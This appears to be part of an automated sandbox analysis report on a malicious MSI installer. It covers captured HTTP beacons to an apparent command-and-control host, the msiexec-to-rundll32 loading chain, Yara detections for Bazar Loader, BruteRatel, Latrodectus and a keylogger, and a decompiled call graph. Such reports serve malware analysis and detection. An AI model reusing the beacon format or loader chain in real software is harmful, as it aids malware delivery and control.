                                                                                                                                                                                                                                                2024-10-03 18:48:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                93192.168.2.762420188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:48:21 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFo4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:48:21 UTC542INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:21 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jwiLShNva6C6lgWXdpy4OJy1gG879%2FwBt6n3Kv8YhcDiiHrhxr3IwSVjHNBOKn7YjTxKrNa7OW6WpCx1H6BeMhHZetGvXggMdbm5V%2Bn1Rja4MllbdTuIt0BLV6c%2BYhQeMCND"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1b1eec54c47c-EWR
                                                                                                                                                                                                                                                2024-10-03 18:48:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                Start time:14:44:15
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\das.msi"
                                                                                                                                                                                                                                                Imagebase:0x7ff790130000
                                                                                                                                                                                                                                                File size:69'632 bytes
                                                                                                                                                                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                Start time:14:44:15
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                Imagebase:0x7ff790130000
                                                                                                                                                                                                                                                File size:69'632 bytes
                                                                                                                                                                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                Start time:14:44:16
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 042055341D46BDE43A4D1CB4423C312E
                                                                                                                                                                                                                                                Imagebase:0x2f0000
                                                                                                                                                                                                                                                File size:59'904 bytes
                                                                                                                                                                                                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                                Start time:14:44:16
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Windows\Installer\MSIA029.tmp
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Windows\Installer\MSIA029.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                                                                                                                                                                                                                                                Imagebase:0xf30000
                                                                                                                                                                                                                                                File size:399'328 bytes
                                                                                                                                                                                                                                                MD5 hash:B9545ED17695A32FACE8C3408A6A3553
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                                Start time:14:44:16
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                                                                                                                                                                                                                                                Imagebase:0x7b0000
                                                                                                                                                                                                                                                File size:61'440 bytes
                                                                                                                                                                                                                                                MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                                Start time:14:44:17
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                                                                                                                                                                                                                                                Imagebase:0x7ff62c120000
                                                                                                                                                                                                                                                File size:71'680 bytes
                                                                                                                                                                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Bazar_2, Description: Yara detected Bazar Loader, Source: 00000006.00000002.3805911238.0000016AD2750000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.1788490722.0000016AD2873000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.1788619377.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.1788490722.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Bazar_2, Description: Yara detected Bazar Loader, Source: 00000006.00000002.3805853254.0000016AD2700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.1788405088.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                                Start time:14:45:01
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                                                Imagebase:0x7ff70ffd0000
                                                                                                                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000009.00000002.3810547319.000000000892C000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:1.6%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                  Signature Coverage:38.3%
                                                                                                                                                                                                                                                  Total number of Nodes:389
                                                                                                                                                                                                                                                  Total number of Limit Nodes:10
                                                                                                                                                                                                                                                  execution_graph 33381 f53084 33382 f53090 __FrameHandler3::FrameUnwindToState 33381->33382 33407 f52de4 33382->33407 33384 f53097 33385 f531ea 33384->33385 33396 f530c1 ___scrt_is_nonwritable_in_current_image IsInExceptionSpec ___scrt_release_startup_lock 33384->33396 33441 f533a8 4 API calls 2 library calls 33385->33441 33387 f531f1 33442 f62ed9 23 API calls IsInExceptionSpec 33387->33442 33389 f531f7 33443 f62e9d 23 API calls IsInExceptionSpec 33389->33443 33391 f531ff 33392 f530e0 33393 f53161 33418 f534c3 GetStartupInfoW codecvt 33393->33418 33395 f53167 33419 f3cdb0 GetCommandLineW 33395->33419 33396->33392 33396->33393 33440 f62eb3 41 API calls 4 library calls 33396->33440 33408 f52ded 33407->33408 33444 f535a9 IsProcessorFeaturePresent 33408->33444 33410 f52df9 33445 f558dc 10 API calls 2 library calls 33410->33445 33412 f52dfe 33417 f52e02 33412->33417 33446 f6393e 33412->33446 33415 f52e19 33415->33384 33417->33384 33418->33395 33420 f3cdf8 33419->33420 33505 f31f80 LocalAlloc 33420->33505 33422 f3ce09 33506 f369a0 33422->33506 33424 f3ce58 33425 f3ce69 33424->33425 33426 f3ce5c 33424->33426 33514 f3c6a0 LocalAlloc LocalAlloc 33425->33514 33596 f36600 98 API calls __ehhandler$___std_fs_get_file_attributes_by_handle@8 33426->33596 33429 f3ce65 33431 f3ceb0 ExitProcess 33429->33431 33430 f3ce72 33515 f3c870 33430->33515 33436 f3cea4 33598 f3cec0 LocalFree LocalFree 33436->33598 33437 f3ce9a 33597 f3cce0 CreateFileW SetFilePointer WriteFile CloseHandle 33437->33597 33440->33393 33441->33387 33442->33389 33443->33391 33444->33410 33445->33412 33450 f6bedb 33446->33450 33449 f558fb 7 API calls 2 library calls 33449->33417 33451 f52e0b 33450->33451 33452 f6beeb 33450->33452 33451->33415 33451->33449 33452->33451 33454 f66d2d 33452->33454 33455 f66d39 __FrameHandler3::FrameUnwindToState 33454->33455 33466 f61c9a EnterCriticalSection 33455->33466 33457 f66d40 33467 f6c4cc 33457->33467 33462 f66d59 33481 f66c7d GetStdHandle GetFileType 33462->33481 33463 f66d6f 33463->33452 33465 f66d5e 33482 f66d84 LeaveCriticalSection std::_Lockit::~_Lockit 33465->33482 33466->33457 33468 f6c4d8 __FrameHandler3::FrameUnwindToState 33467->33468 33469 f6c502 33468->33469 33470 f6c4e1 33468->33470 33483 f61c9a EnterCriticalSection 33469->33483 33491 f57370 14 API calls __dosmaperr 33470->33491 33473 f6c4e6 33492 f57017 41 API calls collate 33473->33492 33474 f6c50e 33479 f6c53a 33474->33479 33484 f6c41c 33474->33484 33476 f66d4f 33476->33465 33480 f66bc7 44 API calls 33476->33480 33493 f6c561 LeaveCriticalSection std::_Lockit::~_Lockit 33479->33493 33480->33462 33481->33465 33482->33463 33483->33474 33494 f670bb 33484->33494 33486 f6c42e 33490 f6c43b 33486->33490 33501 f6776f 6 API calls std::_Lockit::_Lockit 33486->33501 33489 f6c490 33489->33474 33502 f653b8 14 API calls 2 library calls 33490->33502 33491->33473 33492->33476 33493->33476 33499 f670c8 std::_Locinfo::_W_Getdays 33494->33499 33495 f67108 33504 f57370 14 API calls __dosmaperr 33495->33504 33496 f670f3 RtlAllocateHeap 33497 f67106 33496->33497 33496->33499 33497->33486 33499->33495 33499->33496 33503 f6bf83 EnterCriticalSection LeaveCriticalSection std::_Locinfo::_W_Getdays 33499->33503 33501->33486 33502->33489 33503->33499 33504->33497 33505->33422 33507 f369f2 33506->33507 33508 f36a34 33507->33508 33511 f36a22 33507->33511 33509 f52937 __ehhandler$___std_fs_get_file_attributes_by_handle@8 5 API calls 33508->33509 33510 f36a42 33509->33510 33510->33424 33599 f52937 33511->33599 33513 f36a30 33513->33424 33514->33430 33517 f3c889 33515->33517 33519 f3cb32 33515->33519 33516 f3cb92 33607 f36250 14 API calls 33516->33607 33517->33516 33517->33519 33522 f36a50 33519->33522 33520 f3cba2 RegOpenKeyExW 33520->33519 33521 f3cbc0 RegQueryValueExW 33520->33521 33521->33519 33523 f36aa3 GetCurrentProcess OpenProcessToken 33522->33523 33524 f36a84 33522->33524 33528 f36b09 33523->33528 33543 f36adf 33523->33543 33525 f52937 __ehhandler$___std_fs_get_file_attributes_by_handle@8 5 API calls 33524->33525 33526 f36a9f 33525->33526 33526->33436 33526->33437 33608 f35de0 33528->33608 33530 f36b02 33656 f357c0 GetCurrentProcess OpenProcessToken 33530->33656 33531 f36af4 CloseHandle 33531->33530 33534 f36b20 33536 f31770 42 API calls 33534->33536 33535 f36b2e 33537 f36b32 33535->33537 33538 f36b3f 33535->33538 33536->33543 33540 f31770 42 API calls 33537->33540 33611 f35f40 ConvertSidToStringSidW 33538->33611 33539 f36ddb 33544 f32310 56 API calls 33539->33544 33540->33543 33542 f36c29 33542->33539 33546 f36c43 33542->33546 33543->33530 33543->33531 33547 f36e04 33544->33547 33661 f32310 33546->33661 33550 f36d8a 33547->33550 33554 f346f0 52 API calls 33547->33554 33793 f311d0 RaiseException _com_raise_error 33550->33793 33563 f36e29 33554->33563 33555 f36b85 33642 f32e60 33555->33642 33558 f36e59 33561 f32310 56 API calls 33558->33561 33559 f32e60 42 API calls 33562 f36bf5 33559->33562 33564 f36e68 33561->33564 33648 f31770 33562->33648 33563->33558 33743 f34ac0 42 API calls 3 library calls 33563->33743 33564->33550 33574 f346f0 52 API calls 33564->33574 33566 f36cad 33567 f32310 56 API calls 33566->33567 33571 f36cc7 33567->33571 33570 f36c7c 33570->33566 33570->33570 33740 f34ac0 42 API calls 3 library calls 33570->33740 33571->33550 33576 f346f0 52 API calls 33571->33576 33572 f36c16 CloseHandle 33572->33530 33578 f36e8a 33574->33578 33575 f36eb9 33577 f32310 56 API calls 33575->33577 33584 f36ce9 33576->33584 33579 f36ec4 33577->33579 33578->33575 33744 f34ac0 42 API calls 3 library calls 33578->33744 33579->33550 33586 f346f0 52 API calls 33579->33586 33580 f36d19 33581 f32310 56 API calls 33580->33581 33583 f36d24 33581->33583 33583->33550 33588 f346f0 52 API calls 33583->33588 33584->33580 33741 f34ac0 42 API calls 3 library calls 33584->33741 33590 f36ee6 33586->33590 33587 f36f10 33746 f352f0 33587->33746 33594 f36d46 33588->33594 33590->33587 33745 f34ac0 42 API calls 3 library calls 33590->33745 33591 f36d70 33694 f34ba0 33591->33694 33594->33591 33742 f34ac0 42 API calls 3 library calls 33594->33742 33596->33429 33597->33436 33598->33431 33600 f52940 IsProcessorFeaturePresent 33599->33600 33601 f5293f 33599->33601 33603 f529a5 33600->33603 33601->33513 33606 f52968 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 33603->33606 33605 f52a88 33605->33513 33606->33605 33607->33520 33794 f35e40 GetTokenInformation 33608->33794 33612 f35fd2 33611->33612 33613 f35fac 33611->33613 33614 f324c0 47 API calls 33612->33614 33616 f324c0 47 API calls 33613->33616 33615 f35fc9 33614->33615 33617 f36003 33615->33617 33618 f35ff5 LocalFree 33615->33618 33616->33615 33619 f324c0 33617->33619 33618->33617 33621 f324d1 _LStrxfrm 33619->33621 33626 f324fd 33619->33626 33620 f325f5 33805 f32770 42 API calls 33620->33805 33621->33555 33622 f32515 33627 f325f0 33622->33627 33628 f32566 LocalAlloc 33622->33628 33624 f325fa 33806 f57027 41 API calls 2 library calls 33624->33806 33626->33620 33626->33622 33626->33627 33630 f32582 33626->33630 33804 f32d70 RaiseException _com_raise_error 33627->33804 33628->33624 33632 f32577 33628->33632 33633 f32586 LocalAlloc 33630->33633 33639 f32593 _LStrxfrm 33630->33639 33632->33639 33633->33639 33638 f325e5 33638->33555 33639->33624 33639->33638 33640 f325d8 33639->33640 33640->33638 33641 f325de LocalFree 33640->33641 33641->33638 33643 f32eb7 33642->33643 33644 f32e8d 33642->33644 33643->33559 33644->33642 33645 f32eaa 33644->33645 33807 f57027 41 API calls 2 library calls 33644->33807 33645->33643 33646 f32eb0 LocalFree 33645->33646 33646->33643 33649 f317c1 33648->33649 33650 f3179b 33648->33650 33649->33530 33649->33572 33651 f317ba LocalFree 33650->33651 33652 f317e5 33650->33652 33653 f317b4 33650->33653 33651->33649 33808 f57027 41 API calls 2 library calls 33652->33808 33653->33649 33653->33651 33657 f357e1 33656->33657 33658 f357e7 GetTokenInformation 33656->33658 33657->33542 33659 f35816 33658->33659 33660 f3581e CloseHandle 33658->33660 33659->33660 33660->33542 33662 f32348 33661->33662 33674 f3239c 33661->33674 33809 f52c98 6 API calls 33662->33809 33664 f32352 33666 f3235e GetProcessHeap 33664->33666 33664->33674 33810 f52faa 44 API calls 33666->33810 33668 f323b6 33675 f32427 33668->33675 33813 f52faa 44 API calls 33668->33813 33669 f3238b 33811 f52c4e EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 33669->33811 33672 f32416 33814 f52c4e EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 33672->33814 33674->33675 33812 f52c98 6 API calls 33674->33812 33675->33550 33676 f346f0 33675->33676 33677 f34700 33676->33677 33678 f34766 33676->33678 33677->33678 33815 f3d156 RaiseException EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 33677->33815 33678->33570 33680 f3471a 33680->33678 33681 f34730 FindResourceExW 33680->33681 33684 f34771 33680->33684 33816 f345b0 LoadResource LockResource SizeofResource 33680->33816 33817 f3d156 RaiseException EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 33680->33817 33681->33680 33684->33678 33685 f34775 FindResourceW 33684->33685 33685->33678 33686 f34783 33685->33686 33818 f345b0 LoadResource LockResource SizeofResource 33686->33818 33688 f34790 33688->33678 33819 f57383 41 API calls 3 library calls 33688->33819 33690 f347e2 33690->33570 33691 f347d1 33691->33690 33820 f311d0 RaiseException _com_raise_error 33691->33820 33695 f357c0 4 API calls 33694->33695 33696 f34bed 33695->33696 33697 f34bf3 33696->33697 33698 f34c15 CoInitialize CoCreateInstance 33696->33698 33701 f352f0 89 API calls 33697->33701 33699 f34c58 VariantInit 33698->33699 33700 f34c4f 33698->33700 33703 f34c9e 33699->33703 33702 f34c0d 33700->33702 33704 f35187 CoUninitialize 33700->33704 33701->33702 33705 f52937 __ehhandler$___std_fs_get_file_attributes_by_handle@8 5 API calls 33702->33705 33706 f34cb1 IUnknown_QueryService 33703->33706 33714 f34ca8 VariantClear 33703->33714 33704->33702 33707 f351a7 33705->33707 33709 f34ce0 33706->33709 33706->33714 33707->33550 33710 f34d31 IUnknown_QueryInterface_Proxy 33709->33710 33709->33714 33711 f34d5a 33710->33711 33710->33714 33712 f34d7f IUnknown_QueryInterface_Proxy 33711->33712 33711->33714 33713 f34da8 CoAllowSetForegroundWindow 33712->33713 33712->33714 33715 f34dc2 SysAllocString 33713->33715 33716 f34e28 SysAllocString 33713->33716 33714->33700 33719 f34df8 SysAllocString 33715->33719 33720 f34def 33715->33720 33716->33715 33717 f351b0 _com_issue_error 33716->33717 33825 f311d0 RaiseException _com_raise_error 33717->33825 33722 f34e3d VariantInit 33719->33722 33723 f34e1d 33719->33723 33720->33717 33720->33719 33727 f34ebd 33722->33727 33723->33717 33723->33722 33725 f34ec1 VariantClear VariantClear VariantClear VariantClear SysFreeString 33725->33714 33727->33725 33737 f34f1b 33727->33737 33728 f324c0 47 API calls 33728->33737 33731 f32e60 42 API calls 33731->33737 33732 f34fd5 OpenProcess WaitForSingleObject 33734 f3500b GetExitCodeProcess 33732->33734 33732->33737 33734->33737 33735 f351ab 33824 f57027 41 API calls 2 library calls 33735->33824 33736 f3506e LocalFree 33736->33737 33737->33725 33737->33727 33737->33728 33737->33731 33737->33732 33737->33735 33737->33736 33738 f35025 CloseHandle 33737->33738 33821 f312f0 49 API calls 2 library calls 33737->33821 33822 f33860 119 API calls 2 library calls 33737->33822 33823 f34270 10 API calls 33737->33823 33738->33737 33740->33566 33741->33580 33742->33591 33743->33558 33744->33575 33745->33587 33747 f35361 33746->33747 33826 f35d30 33747->33826 33749 f3537b 33750 f35d30 41 API calls 33749->33750 33751 f3538b 33750->33751 33830 f359c0 33751->33830 33753 f357b0 33849 f311d0 RaiseException _com_raise_error 33753->33849 33755 f3539b 33755->33753 33838 f57852 33755->33838 33759 f353e1 33760 f35d30 41 API calls 33759->33760 33773 f353f5 33760->33773 33761 f354cc 33762 f3551d GetForegroundWindow 33761->33762 33787 f35529 33761->33787 33762->33787 33763 f355f7 ShellExecuteExW 33764 f35612 33763->33764 33765 f35609 33763->33765 33766 f35646 33764->33766 33769 f35625 ShellExecuteExW 33764->33769 33847 f35890 6 API calls 33765->33847 33776 f356fd 33766->33776 33777 f3566c GetModuleHandleW GetProcAddress 33766->33777 33767 f35493 GetWindowsDirectoryW 33845 f35b10 70 API calls 33767->33845 33769->33766 33771 f3563d 33769->33771 33848 f35890 6 API calls 33771->33848 33772 f354b4 33846 f35b10 70 API calls 33772->33846 33773->33761 33773->33767 33778 f35721 33776->33778 33779 f3570e WaitForSingleObject GetExitCodeProcess 33776->33779 33781 f3568a AllowSetForegroundWindow 33777->33781 33841 f35940 33778->33841 33779->33778 33781->33776 33782 f35698 33781->33782 33782->33776 33783 f356a1 GetModuleHandleW GetProcAddress 33782->33783 33784 f356b4 33783->33784 33785 f356fa 33783->33785 33790 f356c8 Sleep EnumWindows 33784->33790 33791 f356ed 33784->33791 33785->33776 33787->33763 33788 f52937 __ehhandler$___std_fs_get_file_attributes_by_handle@8 5 API calls 33789 f357a8 33788->33789 33789->33550 33790->33784 33790->33791 33918 f35830 GetWindowThreadProcessId GetWindowLongW 33790->33918 33791->33785 33792 f356f3 BringWindowToTop 33791->33792 33792->33785 33795 f35e18 33794->33795 33796 f35ebe GetLastError 33794->33796 33795->33534 33795->33535 33796->33795 33797 f35ec9 33796->33797 33798 f35f0e GetTokenInformation 33797->33798 33799 f35ee9 33797->33799 33801 f35ed9 codecvt 33797->33801 33798->33795 33803 f360d0 45 API calls 3 library calls 33799->33803 33801->33798 33802 f35ef2 33802->33798 33803->33802 33809->33664 33810->33669 33811->33674 33812->33668 33813->33672 33814->33675 33815->33680 33816->33680 33817->33680 33818->33688 33819->33691 33821->33737 33822->33737 33823->33737 33827 f35d6e 33826->33827 33829 f35d7d 33827->33829 33850 f34a10 41 API calls 4 library calls 33827->33850 33829->33749 33831 f35a03 33830->33831 33832 f359f8 33830->33832 33835 f32310 56 API calls 33831->33835 33836 f35a1a 33831->33836 33833 f35d30 41 API calls 33832->33833 33834 f35a01 33833->33834 33834->33755 33835->33836 33851 f35a60 42 API calls 33836->33851 33852 f57869 33838->33852 33842 f35971 33841->33842 33843 f3572d 33841->33843 33842->33843 33844 f35981 CloseHandle 33842->33844 33843->33788 33844->33843 33845->33772 33846->33761 33847->33764 33848->33766 33850->33829 33851->33834 33857 f57078 33852->33857 33858 f57096 33857->33858 33859 f5708f 33857->33859 33858->33859 33902 f657cc 41 API calls 3 library calls 33858->33902 33865 f576d9 33859->33865 33861 f570b7 33903 f65ab7 41 API calls __Getcoll 33861->33903 33863 f570cd 33904 f65b15 41 API calls std::_Locinfo::_W_Getdays 33863->33904 33867 f57709 ___crtCompareStringW 33865->33867 33870 f576f3 33865->33870 33869 f57720 33867->33869 33867->33870 33868 f576f8 33906 f57017 41 API calls collate 33868->33906 33873 f57702 33869->33873 33907 f65c2a 6 API calls 2 library calls 33869->33907 33905 f57370 14 API calls __dosmaperr 33870->33905 33875 f52937 __ehhandler$___std_fs_get_file_attributes_by_handle@8 5 API calls 33873->33875 33874 f5776e 33876 f5778f 33874->33876 33877 f57778 33874->33877 33880 f353d3 33875->33880 33878 f577a5 33876->33878 33879 f57794 33876->33879 33908 f57370 14 API calls __dosmaperr 33877->33908 33883 f57826 33878->33883 33885 f577cc 33878->33885 33892 f577b9 __alloca_probe_16 33878->33892 33910 f57370 14 API calls __dosmaperr 33879->33910 33880->33753 33880->33759 33915 f57370 14 API calls __dosmaperr 33883->33915 33884 f5777d 33909 f57370 14 API calls __dosmaperr 33884->33909 33911 f65bdc 15 API calls 2 library calls 33885->33911 33888 f5782b 33916 f57370 14 API calls __dosmaperr 33888->33916 33891 f577d2 33891->33883 33891->33892 33892->33883 33895 f577e6 33892->33895 33893 f57813 33917 f52326 14 API calls std::locale::_Locimp::~_Locimp 33893->33917 33912 f65c2a 6 API calls 2 library calls 33895->33912 33897 f57802 33898 f57809 33897->33898 33899 f5781a 33897->33899 33913 f5b762 41 API calls 2 library calls 33898->33913 33914 f57370 14 API calls __dosmaperr 33899->33914 33902->33861 33903->33863 33904->33859 33905->33868 33906->33873 33907->33874 33908->33884 33909->33873 33910->33868 33911->33891 33912->33897 33913->33893 33914->33893 33915->33888 33916->33893 33917->33873

                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                  Function 00F34BA0 Relevance: 36.5, APIs: 24, Instructions: 502comCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
